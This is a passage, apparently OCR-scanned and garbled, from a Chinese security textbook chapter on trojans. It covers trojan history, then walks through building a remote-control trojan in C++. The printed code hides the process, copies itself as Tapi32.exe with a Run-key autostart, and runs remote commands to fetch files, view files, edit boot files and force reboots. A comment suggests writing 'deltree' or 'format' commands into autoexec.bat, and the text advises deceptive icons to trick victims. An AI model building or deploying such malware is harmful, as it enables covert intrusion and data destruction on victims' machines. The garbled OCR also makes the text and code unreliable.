制 端 ); 男 一 种 是 控制 端 主 动 和 木马 联系 (控制 端 通过 扫描 技术 去 发 现 运 行 木马 的 目标 机 )。 

经 过 这 一 阶段 后 ,控制 端 建立 起 了 和 目标 机 的 联系 ,目标 机 就 处 于 被 监控 状态 。 
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(3) 建立 木马 信道 : 对 于 大 多 数 木 马 来 说 ,前 期 植 入 到 目标 机 的 仅仅 是 一 个 种 子 或 木 
马 的 人 简单 版 本 。 通 道 建立 成 功 后 ,通过 配置 参数 或 下 载 插 件 等 方式 扩充 木马 的 功能 ,使 其 成 
为 功能 完善 的 木马 。 这 就 是 图 5-1(c) 的 主要 工作 。 

(4) 使 用 阶段 : 如 图 5-1(d) 所 示 , 木 马 与 控制 端的 交互 也 就 是 使 用 阶段 。 该 阶段 就 是 
通过 木马 通道 在 控制 端 和 目标 主机 之 间 进 行 命令 和 数据 的 交互 。 


5.1.5 木马 的 技术 发 展 


从 技术 角度 来 看 ,木马 程序 技术 发 展 至 今 已 经 经 历 了 4 个 阶段 。 

第 一 阶段 主要 实现 简单 的 密码 禄 取 、 发 送 等 功能 ,没有 什么 特别 之 处 。 

第 二 阶段 在 技术 上 有 了 很 大 的 进步 ,主要 体现 在 隐藏 .控制 等 方面 。 国 内 的 冰河 可 以 说 
是 这 个 阶段 的 典型 代表 之 一 。 

第 三 阶段 在 数据 传递 技术 上 做 了 不 小 的 改进 ,出现 了 基于 ICMP 协议 的 木马 ,这 种 木马 
利用 ICMP 协议 的 畸形 报 文 传递 数据 ,增加 了 查 杀 的 难度 。 

第 四 阶段 在 进程 隐藏 方面 做 了 非常 大 的 改动 ,采用 了 内 核 插 入 式 的 艇 入 方式 ,利用 远程 
搬入 线 程 技术 骨 入 DLL 线程 ,或 者 用 挂 接 PSAPI 函数 实现 木马 程序 的 隐藏 。 即 使 在 
Windows NT/Windows 2000 下 ,这些 技 术 都 达到 了 恨 好 的 隐藏 效果 。 

相信 ,第 五 阶段 木马 的 技术 将 更 加 先进 。 

现在 的 木马 有 很 多 高 级 技巧 可 以 被 程序 员 和 利用、 修改 并 进一步 传播 。 具 有 新 功能 和 更 
好 加 密 方 法 的 木马 每 天 都 在 出 现 , 以 至 于 防 木 马 软件 根本 就 不 能 检测 到 它们 。 木 马 技术 的 
发 展 趋势 如 下 。 

1. 跨 平台 性 

它 主要 是 针对 Windows 系统 而 言 。 木 马 的 使 用 者 当然 希望 一 个 木马 可 以 在 Windows 
95/Windows 98 下 使 用 ,最 好 在 Windows NT/Windows 2000, 甚 至 Windows 7 和 Windows 8 
下 也 可 以 使 用 。 随 着 微软 不 断 推出 新 的 操作 系统 ,安全 性 不 断 加 强 , Windows XP 和 
Windows 2000 采用 了 NT 内核 ,安全 性 大 幅 提 高 。Windows 7 提供 了 UAC( 用 户 账 户 控 
制 )\ASLR( 地 址 空间 随机 化 ) 等 新 特征 来 对 抗 恶 意 代 码 。 因 此 ,能 文 持 多 种 平台 的 木马 程 
序 技术 难度 非常 大 。 

2. 模块 化 设计 

似乎 模块 化 设计 是 一 种 潮流 , Winamp 就 是 模块 化 的 典范 。 现 在 的 木马 也 有 了 模块 化 
设计 的 概念 , 像 BO、NetBus 以 及 SUB7 等 经 典 木 马 都 有 一 些 优秀 的 插件 纷纷 问世 ,这 些 都 
是 很 好 的 说 明 。 

3. 更 新 更 强 的 感染 模式 

传统 的 修改 INI 文件 和 注册 表 的 手法 已 经 不 能 满足 木马 的 需要 。 当 前 ,很 多 木马 的 感 
染 方 式 已 经 开始 悄悄 转变 。 例 如 ,YAI 木马 事件 就 给 了 人 们 很 多 的 启发 ,该 木马 像 病毒 一 
样 感染 Windows 下 的 文件 , 它 给 攻防 双方 都 禹 来 很 多 启发。 

4. 即时 通知 

木马 是 否 已 经 装 和 人 ? 目标 在 哪里 ? 如 果 中 木马 的 人 使 用 固定 IP 的 话 , 比 较 容 易 解 决 这 
些 问题 。 如 果 目 标 机 使 用 的 是 动态 IP, 应 该 怎么 办 ?使 用 常用 的 扫描 方法 ,速度 太 慢 。 目 
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前 ,个 别 木 马 已 经 有 了 了 即时 通知 的 功能 ,它们 利用 诸如 IRC ICQ 等 即时 消息 工具 通知 挥 
制 端 。 
5. 更 强 更 多 的 功能 


木马 制作 者 的 欲望 部 是 无 止境 的 ,每 当 实 现 强 大 功能 的 时 候 , 他 们 就 期 望 更 强大 的 功 
能 。 以 后 的 木马 的 功能 会 如 何 呢 ?也 许 会 让 人 们 大 吃 一 慰 的 。 


5.2 人 简单 木马 程序 实验 


由 于 很 多 新 手 对 安全 问题 了 解 不 多 ,因此 并 不 知道 自己 的 计算 机 中 了 “木马 ”后 该 怎么 
去 清除 。 如 果 想 要 有 效 地 发 现 并 清除 木马 ,最 关键 的 还 是 要 知道 木马 的 工作 原理 。 用 木马 
程序 进行 网 络 人 侵 , 从 过 程 上 看 大 致 可 分 为 6 步 : 配置 木马 (实现 伪装 和 信息 反馈 ) ,传播 木 
马 ( 通 过 E-mail 病毒 和 软件 等 )、. 运行 木马 、 信 息 获 取 、 建 立 连接 和 远程 控制 (实现 对 受害 者 
的 控制 )。 其 中 建立 连接 的 过 程 如 图 5-2 所 示 。 


控制 端 服务 端 
202.120.0.100 A ? 
QD 通过 信息 || 反 馈 或 I[P 扫 
(2) 获得 服务 器 端 IP 描 获 得 服 || 务 器 IP 地 址 
(3) 木马 连接 建立 Am 
202 .120.0.100 D=— 202.99.99.101 


中 控制 端 IP; (2 木 马 端口 ;服务 端 端口 ; 由 服务 端 耳 
图 5-2 木马 建立 连接 示意 图 


在 图 5-2 中 ,A 机 为 控制 端 ,B 机 为 服务 端 。 对 于 A 机 来 说 ,要 与 B 机 创建 连接 就 必须 
知道 B 机 的 木马 端口 和 IP 地 址 ,由 于 木马 端口 是 A 机 事先 设 定 的 ,因此 最 重要 的 是 如 何 获 
得 B 机 的 IP 地址。 获得 B 机 的 IP 地 址 的 方法 主要 有 两 种 : 信息 反馈 和 IP 扫描 。 信 息 反 
馈 是 指 服务 端 主动 反馈 信息 给 控制 端 。 因 为 B 机 装 有 木马 程序 ,所 以 它 的 木马 端口 7626 
是 处 于 开放 状态 的 ,因此 现在 A 机 只 要 扫描 IP 地 址 段 中 7626 端口 开放 的 主机 就 行 了 。 图 
中 B 机 的 IP 地 址 是 202. 99. 99.101, 当 A 机 扫描 到 这 个 了 了 时 发 现 它 的 7626 端口 是 开放 
的 ,那么 这 个 IP 就 会 被 添加 到 列表 中 ,这 时 A 机 就 可 以 通过 木马 的 控制 端 程序 向 B 机 发 出 
连接 信号 ,B 机 中 的 木马 程序 收 到 信号 后 立即 做 出 啊 应 , 当 A 机 收 到 啊 应 的 信号 后 ,开启 一 
个 随机 端口 1037 与 也 机 的 木马 端口 7626 建立 连接 ,这 时 一 个 木马 连接 才 算 真正 建立 。 由 
于 拨号 上 网 的 IP 是 动态 的 , 即 每 次 上 网 的 IP 都 是 不 同 的 ,但 是 这 个 IP 是 在 一 定 范 围 内 变 
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动 的 ,因此 ,一 般 来 说 控制 端 都 是 先 通过 信息 反馈 获得 服务 端的 IP 地 址 ,然后 再 进行 IP 
扫描 。 

自从 1998 年 “ 死 牛 崇拜 ?黑客 小 组 公布 BO(Back Orifice) 以 来 ,木马 犹如 平地 上 的 惊 
雷 ,使 中 国 网 民 从 五 彩 缤纷 的 网 络 梦 中 惊醒 ,终于 认识 到 网 络 也 有 它 邪 恶 的 一 面 。 其 实 也 不 
必 太 担心 自己 的 计算 机 是 否 被 别人 种 了 木马 ,我 们 可 以 通过 进一步 学 习 它 、 了 解 它 , 并 且 进 
一 步 编写 它 ,来 认 清 木马 的 真实 面目 。 

木马 一 定 是 由 两 部 分 组 成 , 即 服 务 器 程序 (Server) 和 客户 端 程序 (Client) ,服务 器 负责 
打开 攻击 的 道路 ,就 像 一 个 内 奸 特务 。 客 户 端 负责 攻击 目标 ,两 者 需要 一 定 的 网 络 协议 
(TCP/IP、UDP、ICMP 等 协议 ) 来 进行 通信 。 


【实验 目的 】 
擎 握 木马 病毒 的 基本 原理 。 
【实验 平台 】 


(1) Windows XP 操作 系统 。 

(2) Visual Studio 6. 0 编程 环境 。 

【实验 步骤 了】 

(1) 复制 实验 文件 到 实验 的 计算 机 上 (源码 位 置 : 本 书 配套 素材 目录 \ 下 xperimentA 
SimpleHorse\)。 其 中 ,SocketListener 目录 下 是 木马 Server 端 源 代 码 ,SocketCommand 目 
录 下 是 木马 Client 端 源 代码 。 

(2) 用 Visual Studio 6. 0 环境 分 别 编 译 这 两 部 分 代码 编译 。 

(3) 运行 SocketListener 应 用 程序 ,也 就 是 局 动 了 木马 被 控制 端 。 

(4) 运行 SocketCommand 应 用 程序 ,也 就 是 局 动 了 木马 的 控制 端 ,可 以 在 控制 端 执行 
命令 来 控制 被 控制 端 。 关 于 实验 支持 的 命令 如 表 5-1 所 示 。 


表 5-1 实验 程序 支持 命令 列表 


命 令 命令 含义 
CMD 执行 应 用 程序 
! SHUT 退出 木马 
FILEGET 获得 远 端 文件 
EDITCONF 编辑 配置 文件 
LIST 列 目 录 
VIEW 查看 文件 内 容 
CDOPEN CD 
CDCLOSE 关 CD 
REBOOT 重启 远 端 计算 机 

【程序 源码 】 


接 下 来 就 具体 介绍 如 何 编写 一 个 简单 木马 。 首 先 要 选择 熟悉 的 编程 工具 。 目 前 流行 的 
开发 工具 有 C++ Builder、VC、VB 和 Delphi, 这 些 语言 都 各 有 利弊 ,可 以 根据 自己 的 喜好 进 
行 选择 。 为 了 保持 风格 一 致 ,本 书 选 用 VC++ 为 编程 语言 。“ 死 牛 崇 拜 ? 黑 客 小 组 公布 的 
BO2000 源 代 码 也 是 用 VC++ 编 写 的 。 
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启动 VC++ 6.0 企业 版 ,新 建 一 个 基于 对 话 框 的 工程 。 以 CSocket 为 基 类 生成 
CMySocket 类 。CMySocket 类 的 功能 是 使 本 程序 变 成 一 个 服务 需 程 序 , 可 以 对 外 服务 (对 
攻击 者 敞开 大 门 );。 木 马 的 Server 端 需 要 隐藏 ,因此 ,窗口 对 木马 Server 并 来 说 就 是 一 个 累 
袭 。 在 本 书 中 ,为 了 演示 的 需要 ,仍然 在 Server 端 选 择 了 窗 体 。 当 个 人 编写 木马 程序 的 时 
候 ,直接 用 控制 台 程 序 就 可 以 了 。 


5.2.1 自动 隐藏 


首先 应 该 让 木马 程序 能 够 隐身 ,这 里 的 隐身 不 仅仅 是 隐藏 窗口 ,而 是 让 任务 管理 硕 也 看 
不 到 木马 进程 ,这 样 就 增强 了 木马 的 存活 能 力 。 在 Visual Studio 重 载 对 话 框 窗 体 中 添加 
OnCreate 事件 啊 应 函数 ,在 OnCreate 哺 数 中 添加 可 使 木马 在 Windows 9x 中 隐藏 的 代码 。 
在 Windows 9x 中 ,有 一 种 被 称 为 服务 (Service) 的 后 台 进 程 ,该 进程 可 以 运行 在 较 高 的 优先 
级 下 ,非常 类 似 于 系统 核心 的 设备 驱动 程序 。 因 此 ,只 要 将 木马 程序 在 进程 数据 库 中 用 
RegisterServiceProcess 子 数 注册 成 服务 进程 (Service Process) 就 可 以 了 。 由 于 
RegisterServiceProcess 是 核心 级 图 数 , 没 有 正式 公开 ,因此 ,只 好 到 KERNEL32. DLL 中 动 
态 装 载 它 了 。 实 现代 码 如 下 。 


// Windows 9x 隐藏 技术 

DWORD dwVersion = GetVersion( ) ; 

// 得 到 操作 系统 的 版 本 号 

if (dwVersion > = 0x80000000 ) 

// 操作 系统 是 Windows 9x, 不 是 Windows NT 

{ 
typedef DWORD (CALLBACK x LPREGISTERSERVICEPROCESS) (DWORD, DNORD ) ; 
// 定 义 RegisterServiceProcess() 限 数 的 原型 
HINSTANCE hDLL; 
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess; 
hDLL = LoadLibrarVy( "KERNEL32. dl11”) ; 
// 加 载 RegisterServiceProcess( ) 困 数 所 在 的 动态 链接 库 KERNEL32. DLL 
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress( 

hDLL, "RegisterServiceProcess" ); 

// 得 到 RegisterServiceProcess( ) 图 数 的 地 址 
lpRegisterServiceProcess(GetCurrentProcessId( ) ,1) ; 


// 执 行 RegisterServiceProcess() 函 数 , 隐 藏 本 进程 
FreeLibrary( hDLL); 


// 缀 载 动态 链接 库 
} 


这 样 就 实现 了 木马 进程 在 Windows 9x 操作 系统 下 的 隐藏 。 ea 
版 本 呢 ? 这 是 因为 Windows 2000( 包 括 Windows NT) 的 进程 管理 器 可 以 对 后 台 进 程 一 
无 余 , 上 述 代 码 就 不 起 作用 了 。Windows NT/Windows 2000 elem hdlontes 
代码 所 能 解决 的 问题 , 接 下 来 将 讨论 相关 技术 。 读 者 可 以 根据 提供 的 方法 来 实现 Windows 
NT 下 的 隐藏 。 


5.2.2 自动 加 载 
木马 在 受害 者 的 计算 机 上 的 第 一 次 运行 肯定 是 诱骗 执行 的 。 第 一 次 运行 的 时 候 木 马 要 
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做 些 什么 工作 呢 ? 首先 ,木马 要 目 我 复制 一 份 到 特定 位 置 ( 如 加 System% 目录 下 ) ,以 备 上 月 
动 加 载 时 使 用 。 其 次 ,修改 必要 配置 ,实现 计算 机 局 动 时 完成 自动 加 载 过 程 。 在 此 ,采用 了 
一 种 最 经 典 也 是 最 常用 的 日 动 加 载 技 术 : 通过 修改 注册 表 实 现 月 动 加 载 。 代 码 如 下 。 


// 修 改 注 册 表 实现 自动 加 载 
char TempPath[ MAX PRATH ] ; 
GetSystemDirectory(TempPath ,MAX PATH); 


// 获 得 系统 目录 缓冲 区 的 地 址 , MAX_PATH 是 缓冲 区 的 大 小 ,得 到 目标 机 的 Systen 目录 路 径 
CString SystemPath = (CString)TempPath; 


CString commandline = (CString)GetCommandLine( ) ; 
commandline = commandline.Mid( commandline.Find(\"')+1 ); 
commandline = commandline.Left( commandline.Find( \"') ); 


// 获 得 木马 自身 的 位 置 


CopyFile( commandline, SystemPath+ "\\Tapi32. exe", FALSE); 
// 将 自己 复制 到 % Systems% 目录 下 ,并 改名 为 Tapi32. exe, 伪 装 起 来 


CRegKey * registry = new CRegKey!( ) ; 
// 定 义 一 个 CRegKey 对 象 ,准备 修改 注册 表 , 这 一 步 必 不 可 少 


registry— > Open(HKEY LOCAL MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ) ; 
// 打 开 键 值 HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\crossbow 

// 如 果 不 存 在 , 就 创建 它 

unsigned long lRegLength; 

registry ~ > QueryValue(TempPath, "crossbow", &lRegLength); 


CString strTemp = (CString)TempPath; 

If ( strTemp != SVstemPath + "\\Tapi32. exe" ){ 

registry—> SetValue(SVstemPath + "\\Tapi32. exe", "crossbow" ) ; 

// 查 找 是 否 有 "crossbow" 字 样 的 键 值 ,并 且 是 否 为 复制 的 目录 % System% + Tapi32. exe 
// 如 果 不 是 ,就 写 人 以 上 键 值 和 内 容 

} 

delete registrV; // 释 放 指 针 


通过 这 段 代码 ,木马 把 目 己 复制 到 了 系统 目录 下 ,并且 把 目 己 改 成 一 个 类 似 于 系统 文件 
的 名 称 一 一 Tapi32. exe。 于 是 , 当 用 户 每 次 局 动 计算 机 时 ,都 会 日 动 加 载 Tapi32. exe。 木 
马 的 锥 形 已 经 形成 了 , 接 下 来 添加 一 些 控 制 功能 ,实现 一 些 简 单 的 远程 操作 。 


5.2.3 实现 Server 端 功能 


1. 命令 接收 

接 下 来 启动 Server 端的 Socket 来 接收 客户 端的 命令 。 程 序 中 将 Port 设 为 777, 这 就 是 
木马 的 端口 号 ,当然 也 可 以 选用 别 的 数字 (1 一 65535) 。 但 是 要 注意 尽量 不 要 使 用 1024 以 下 
的 低 端 端口 ,因为 这 样 不 但 可 能 会 与 基本 网 络 协议 使 用 的 端口 相 冲 突 , 而 且 很 容易 被 发 觉 ， 
所 以 尽量 使 用 1024 以 上 的 高 端 端口 (不 过 也 有 这 样 一 种 技术 , 它 故 意 使 用 特定 端口 ,如果 引 
起 冲突 ,Windows 也 不 会 报错 ) 。 接 收 并 解析 命令 的 代码 如 下 。 
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char 关 lpBuf; 
lpBuf = new char [1000]; 
for(int i=0;i<1000;i++) 


x (lpBuf + i) = 0; 
} 
// 定 义 并 且 清 空 缓冲 区 


pSocket - > Receive( lpBuf, 1000); 
// 接 收 客户 端 数 据 


if(strnicmp(lpBuf, "CMD:",4) == 0){ 
ExecuteCommand( lpBuf , FALSE); 
}// 执 行 远 端 应 用 程序 
else if(strnicmp(lpBuf,"!SHUT",5) == 0){ 
SendText( "Exit program!", pSocket ); 
OnExit( ) ; 
}// 退 出 木马 程序 
else if(strnicmp(1lpBuf, "FILEGET:",8) == 0){ 
if(!SendFile(1pBuf，PpSocket) ){ 
pSocket -> Send("—1",2); 
} 
}// 获 得 远 端 文件 
else if(strnicmp(lpBuf, "EDITCONF:", 9) ==0){ 
ExecEditCommand( lpBuf, pSocket ); 
}// 编 辑 配 置 文件 
else if(strnicmp(lpBuf, "LIST:", 5) == 0){ 
ExecListCommand( lpBuf, pSocket ); 
}// 列 目录 
else if(strnicmp(lpBuf, "VIEW:", 5) == 0){ 
ExecViewCommand( lpBuf , pSocket); 
}// 查 看 文件 内 容 
else if(strnicmp(lpBuf, "CDOPEN:", 7) == 0){ 
ExecCDOpenCommand( pSocket ); 
}// 打 开 CD - ROM 
else if(strnicmp(lpBuf, "CDCLOSE:", 8) == 0){ 
ExecCDCloseCommand( pSocket ) ; 
}// 关 闭 CD ROM 
else if(strnicmp(1lpBuf, "REBOOT:", 7) == 0){ 
ExecRebootCommand( pSocket ) ; 
}// 远 程 重启 动 


delete [ ] lpBuf; 
// 释 放 缓 冲 区 指针 


2. 修改 配置 

这 部 分 代码 实现 了 修改 目标 机 的 几 种 配置 文件 功能 。 接 下 来 的 代码 可 以 实现 对 
Autoexec. bat 和 Config. sys 两 个 文件 的 修改 。 根 据 这 段 代 码 可 以 轻松 扩展 到 对 其 他 文件 
的 修改 。 
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CString strResult; 

int number = strBuf. GetLength( ) ; 

// 得 到 字符 串 的 长 度 

char file _ type = strBuf. GetAt(10); 

// 第 10 个 字符 存 人 file_type 变量 ,用 于 标示 要 编辑 的 是 哪 一 个 文件 
CString content = strBuf. Mid(12); 

// 余 下 的 字符 串 将 被 作为 写 人 的 内 容 写 人 目标 文件 


_Chmod("c:\autoexec. bat", S_IREAD | S_IWRITE) ; 
_chmod("c:\config. sys", S_IREAD | S_IWRITE); 
// 将 两 个 目标 文件 的 属性 改 为 可 读 可 写 


FILE * fp= NULL; 

char filename[ 20 ] ; 

if (file type== '1'){ 
sprintf(filename,"%s","c:Nautoexec.bat" ) ; 
// 如 果 第 11 个 字符 是 1, 准 备 处 理 Autoexec. bat 
}else if(file type== '2'){ 
sprintf(filename," % s","c:\config. sys" ) ; 
// 如 果 第 11 个 字符 是 2, 准 备 处 理 Config. sys 

} 


int times of try= 0; 

// 定 义 计数 需 

while(fp== NULL) 

{ 

// 如 果 指 针 是 空 

fp = fopen(filename,"a+"); 

// 如 果 文 件 不 存在 ,创建 之 ; 如 果 存 在 ,准备 在 其 后 添加 

// 如 果 出 错 , 文 件 指 针 为 空 ,这 样 就 会 重复 

times of try= times of try+1; 

// 计 数 器 加 1 

if(times of try> 100) 

{ 
// 如 果 已 经 试 了 100 次 了 , 仍 未 成 功 ,退出 
strResult. Format( "%s, %s, %s", "Edit Conf File ", filename, " Error!"); 
SendText( strResult, pSocket ) ; 
return; 

} 

} 


fwrite(content, sizeof (char), strlen(content), fp); 

// 写 人 添加 的 语句 ,例如 deltree -yC: 或 者 format - qcC: 
fclose(fp) ; 

// 写 完 后 关闭 目标 文件 


strResult. Format( "Edit Conf File %s Successful!", filename); 
SendText( strResult, pSocket ); 
// 返 回信 息 到 控制 端 


第 5 章 特洛伊 木马 L933 


3. 实现 list 命令 
有 了 修改 文件 的 功能 ,怎样 才能 找到 目标 文件 呢 ? 当然 是 实现 列 目 录 功 能 了 。 下 面 的 
代码 实现 查看 目标 机 上 的 目录 树 和 文件 ,这 类 似 于 DOS 下 的 dir 命令 。 


CString strResult; 
// 如 果 前 5 个 字符 是 "LIST:" 
int number = strBuf. GetLength( ) ; 
// 得 到 字符 串 的 长 度 
CString Dir Name= strBuf.Mid(6); 
// 从 字符 串 第 六 个 字符 开始 ,将 后 面 的 字符 存 人 Dir_Name 变量 ,这 是 目录 名 
if (Dir Name =="") 
{ 
// 如 果 目 录 名 为 空 
SendText("Fail By Open DIR's Name", pSocket); 
// 返 回 "Fail By Open DIR's Name" 信 息 
return; 


} 


SetCurrentDirectory( (LPCTSTR)Dir Name ); 
// 设 置 当 前 目录 

CFileFind finder; 

BOOL bWorking = finder.FindFile("*.*"); 
while (bWorking) 

// 循 环 得 到 下 一 层 文 件 或 目录 


{ 
bWorking = finder. FindNextFile( ); 


if ( finder. IsDots() || finder. IsDirectory() ){ 
strResult = "Dire: "; 

}elsel{ 
strResult = "File: "; 

} 

strResult += finder. GetFileName( ) ; 

strResult += "\n"; 

} 


SendText( strResult, pSocket ) ; 
// 返 回 Return Text 变量 的 内 容 


4. 实现 View 命令 
接 下 来 实现 查看 指定 文件 内 容 的 功能 。 这 个 功能 类 似 于 DOS 下 的 type 命令。 这 部 分 
的 代码 如 下 。 


CString strResult; 

// 如 果 前 5 个 字符 是 "View:" 

int number = strBuf. GetLength( ) ; 
CString File Name = strBuf.Mid(6); 
// 将 目标 文件 流 存 人 File_Name 变量 中 


int times of try= 0; 
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FILE * fp= NULL; 
while(fp == NULL) 
{ 
fp = fopen( (LPCSTR)File Name, "r"); 
// 打 开 目 标 文件 准备 读 
times of try= times of try+1; 
// 计 数 器 加 1 
if(times of try> 100) 
{ 
// 如 果 已 试 了 100 次 了 
SendText("Fail By Open File", pSocket); 
// 返 回 "Fail By Open File" 的 错误 信息 


return; 


} 


strResult = ""; 

char temp_content[300 ] ; 

for(int i=0;i<300;i++) temp content[i] = "\0'; 
// 定 义 一 个 空 数组 

int Read Num = fread(temp content, 1, 300, fp); 


// 从 目标 文件 中 读 入 前 300 个 字符 
while(Read Num == 300) 
{ 


strResult += (CString)temp content; 
//strResult 的 内 容 加 上 刚才 的 字符 
for(int i=0;i<300;i++) temp content[i] = "\0'; 
Read Num = fread(temp content, 1, 300, fp); 
// 重 复 
}; 


strResult += (CString)temp content; 
//strResult 的 内 容 加 上 刚才 的 字符 
fclose(fp) ; 


// 关 闭 目 标 文 件 
SendText( strResult, pSocket); 
// 返 回 strResult 的 内 容 , 即 查看 文件 的 内 容 


5. 操作 硬件 

除了 操作 软件 之 外 ,还 可 以 通过 命令 控制 目标 机 上 的 硬件 (如 打印 机 、 光 驱 等 )。 下 面 以 
控制 目标 机 上 的 光驱 为 例 进 行 简 单 介绍 。 代 码 的 实现 采用 mciSendString 困 数 ,该 图 数 的 
声明 在 mmsystem. h 头 文件 中 ,编译 时 需要 Winmm. lib 文 持 。 代 码 实现 如 下 。 


// 如 果 收 到 的 是 CDOPEN 命令 
mciSendString(" set cdaudio door open"”,NULL ,0 ,NULL ) ; 


// 就 弹出 光驱 的 托盘 
SendText( "CDOPEN Successful!", pSocket); 


// 返 回信 息 到 控制 端 
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// 如 果 收 到 的 是 CDCLOSE 命令 

mciSendString("Set cdaudio door closed wait", NULL, 0, NULL); 

// 就 收回 光驱 的 托盘 . 当然 也 可 以 设置 一 个 死 循 环 , 让 目标 机 的 光驱 来 回 进出 
SendText( "CDCLOSE Successful!", pSocket); 


// 返 回信 息 到 控制 端 


6. 远程 reboot 


后 就 是 使 目标 机 重新 启动 。 ph Windows NT 和 Windows 9x, 因为 
Windows NT 非常 注重 系统 每 个 用 户 进 程 的 权限 ,一 个 普通 的 进程 不 具备 调用 系统 功能 的 
权利 ,因此 ,要 赋予 本 程序 足够 的 权限 。 pate 


DWORD dwVersion = GetVersion( ); 

// 得 到 操作 系统 的 版 本 号 

if (dwVersion < 0x80000000) 

| 

// 操 作 系 统 是 Windows NT, 不 是 Windows 9x 
HANDLE hToken; 

TOKEN PRIVILEGES tkp; 

// 定 义 变量 

OpenProcessToken( GetCurrentProcess( )， 

TOKEN ADJUST PRIVILEGES | TOKEN QUERY, &hToken); 
//0penProcessToken( ) 这 个 函数 的 作用 是 打开 一 个 进程 的 访问 令 牌 
//GetCurrentProcess( ) 函数 的 作用 是 得 到 本 进程 的 句柄 
LookupPrivilegeValue(NULL, SE SHUTDOWN_ NAME, &tkp.Privileges[0].Luid); 
//LookupPrivilegeValue( ) 的 作用 是 修改 进程 的 权限 
tkp. PrivilegeCount = 1; 

// 赋 给 本 进程 特权 

tkp. Privileges[0].Attributes = SE PRIVILEGE ENABLED,; 
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN PRIVILEGES)NULL, 0); 
//AdjustTokenPrivileges( ) 的 作用 是 通知 Windows NT 修改 本 进程 的 权利 
ExitWindowsEx(EWX REBOOT | EWX FORCE, 0); 

// 强 行 退出 Windows NT 并 重启 

} 

else ExitWindowsEx(EWX FORCE + EWX REBOOT, 0); 

// 强 行 退出 Windows 9x 并 重启 

SendText( "Reboot Successful!", pSocket); 

// 返 回信 息 到 控制 端 


到 此 为 止 ,我 们 的 木马 程序 已 经 初 具 规模 ,并 且 还 能 做 很 多 事情 ,如 控制 硬件 、 修 改 配置 
等 。 尽 管 如 此 ,这 个 木马 也 仅仅 实现 了 一 些 简单 的 功能 ,有 机 会 可 以 看 看 BO2000 的 源 代 
码 ,用 它 来 充实 一 下 自己 编写 的 木马 程序 。 


5.2.4 实现 Client 端 功 能 


客户 端 程序 其 实 是 很 简单 的 , 它 不 需要 隐藏 ,自动 加 载 等 高 深 的 技术 。 它 的 任务 仅仅 是 
发 送 命 令 和 接收 反馈 信息 。 首 先 , 在 Visual Studio 环境 下 新 建 一 个 基于 Dialog 的 应 用 程 
序 。 接 着 ,在 这 个 窗 体 上 放置 一 些 控 件 。 这 些 控件 用 于 输入 IP、Port 命令 以 及 执行 某 些 动 
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作 。 最 后 ,添加 CCommandSocket 类 (其 基 类 是 CSocket 类 ) 到 当前 工程 ,该 类 用 于 和 
Server 问 通 信 。 


实现 客户 端 和 服务 需 端 连接 的 代码 如 下 。 


int status = FALSE; 

m ptrComSocket = new CCommandSocket(this); 

if (!m_ptrComSocket — > Create(0,SOCK STREAM)){ 

status = FALSE; 

AfxMessageBox(MSG SOCKET CREAT FAIL); 

} 

else if(!m ptrComSocket - > Connect( (LPCTSTR)m ip, atoi(m port))) { 
status = FALSE; 

AfxMessageBox(MSG SOCKET CONCT FAIL); 

} 

else{ 

status = TRUE,; 

} 

if(status == FALSE){ 

delete m ptrComSocket; 

m ptrComSocket = NULL; 

m nConnected = FALSE; 

GetDlgItem( IDC TEXT) — > SetWindowText("Connection to "+m ip+" failed"); 


elsel 

m nConnected = TRUE; 

CString csAddr; 

UINT nPort; 

m ptrComSocket - > GetSockName(csAddr, nPort); 

m csCommanderPort. Format(" % d",nPort); 

GetDlgItem( IDC TEXT) - > SetWindowText (csAddr + " successfully connected to " + m ip); 
UpdateData( FALSE); 

} 


发 送 命 令 的 代码 如 下 。 


m ptrComSocket ~ > Send( (void * )m msg, m msg.GetLength() ); 
ReceiveResult(m msg); // 从 服务 器 端 获 取 反 馈 信 息 


断 开 Socket 通信 的 代码 如 下 。 
m ptrComSocket — > Close( ) ; 


delete m ptrComSocket; 


至 此 ,木马 写 完了 。 它 仅仅 演示 了 一 些 原 理性 的 东西 ,程序 界面 非常 简陋 。 如 果 对 简陋 
的 界面 不 满意 ,可 以 利用 VC++ 的 高 次 技术 进行 美化 。 对 于 Server 问 , 可 以 选 一 个 足以 迷惑 
人 的 图 标 ( 例 如 , 选 一 个 目录 模样 的 图 标 ) 进 行 编译 ,这 样 不 但 使 受害 者 容易 中 木马 ,而 且 便 
于 隐藏 上 月 己 。 
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5.2.5 实施 阶段 


在 实施 阶段 ,要 想 尽 一 切 办 法 把 Server 程序 放 到 受害 者 的 计算 机 上 ,然后 诱骗 他 们 执 
行 一 次 木马 程序 。 在 得 到 目标 机 的 IP 后 ,启动 Client 程序 ,连接 到 目标 机 的 777 端口 。 连 
接 成 功 后 ,就 可 以 操作 目标 机 了 。 输 入 “edit conf 1” 编 辑 Autoexec. bat 文件 ,输入 “edit conf 
2” 编 辑 Config. sys 文件 .输入 “list: xxx”(xxx 是 目录 名 ) 可 以 看 到 目录 和 文件 、 输 入 “view 
xxx” 可 以 查看 任何 文件 。 还 有 其 他 命令 ,可 以 慢 慢 测试 。 

以 上 只 是 一 个 简单 的 例子 ,真正 写 起 木马 来 要 解决 的 技术 问题 比 这 多 得 多 ,这 和 需要 扎实 
的 编程 功底 和 丰富 的 经 验 。 下 列 问 题 就 值得 仔细 考虑 : 程序 的 大 小 问题 .启动 方式 的 选择 、 
木马 的 功能 扩充 、 关 掉 防 火 墙 和 杀毒 软件 、 针 对 来 日 反 汇 编 工 具 的 威胁 以 及 日 动 名 载 等 。 


5.3 木马 程序 的 关键 技术 


虽然 木马 程序 千变万化 ,但 其 攻击 方式 是 一 样 的 : 通过 Client 端 程序 各 Server 站 程序 
发 送 指令 ,Server 端 接收 到 控制 指令 后 ,根据 指令 内 容 在 本 地 执行 相关 程序 段 ,然后 把 执行 
结果 返回 给 Client 端 。 

在 5. 2 节 实 现 了 一 个 基本 的 木马 系统 ,该 系统 包含 几 种 基本 技术 : 自动 隐藏 技术 日 动 
加 载 技术 .信息 获取 、 硬 件 操作 、 远 程 重 新 启动 等 。 尽 管 该 系统 已 经 具有 木马 系统 的 各 
形 ,但 是 它 还 不 是 一 个 功能 完整 的 木马 系统 。 接 下 来 介绍 一 些 广 泛 应 用 于 木马 程序 的 天 


5.3.1 植 入 技术 


